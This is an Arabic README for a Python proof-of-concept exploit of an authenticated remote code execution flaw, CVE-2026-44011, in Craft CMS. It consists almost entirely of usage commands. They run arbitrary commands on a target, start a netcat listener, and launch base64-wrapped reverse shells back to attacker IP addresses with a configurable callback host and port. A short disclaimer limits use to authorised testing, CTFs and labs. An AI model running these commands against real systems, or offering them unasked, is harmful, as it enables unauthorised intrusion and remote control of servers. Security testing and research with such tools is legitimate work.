
إثبات مفهوم بلغة Python للثغرة CVE-2026-44011 في Craft CMS، يستغل تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة مع تنفيذ الأوامر وحمولات reverse shell المُغلَّفة بـ base64.
CVE-2026-44011-craft-rce-poc الاستخدام
أمر واحد: bash
python3 craft_rce.py -b http://target -u USER -p PASS -c 'id'
Reverse shell (bash مُغلَّف بـ base64):
nc -lvnp 4444
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.10.14.213 4444
إذا تعذّر على الهدف الوصول إلى الـ callback الخاص بك، وجّهه صراحةً:
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.13.37.200 4444 -H 10.13.37.200 --listen-port 35509
إخلاء المسؤولية
لأغراض الاختبار المصرّح به، وCTFs، وبيئات المختبر فقط. لا تستخدمه ضد أنظمة لا تملكها أو لا تملك إذنًا صريحًا باختبارها.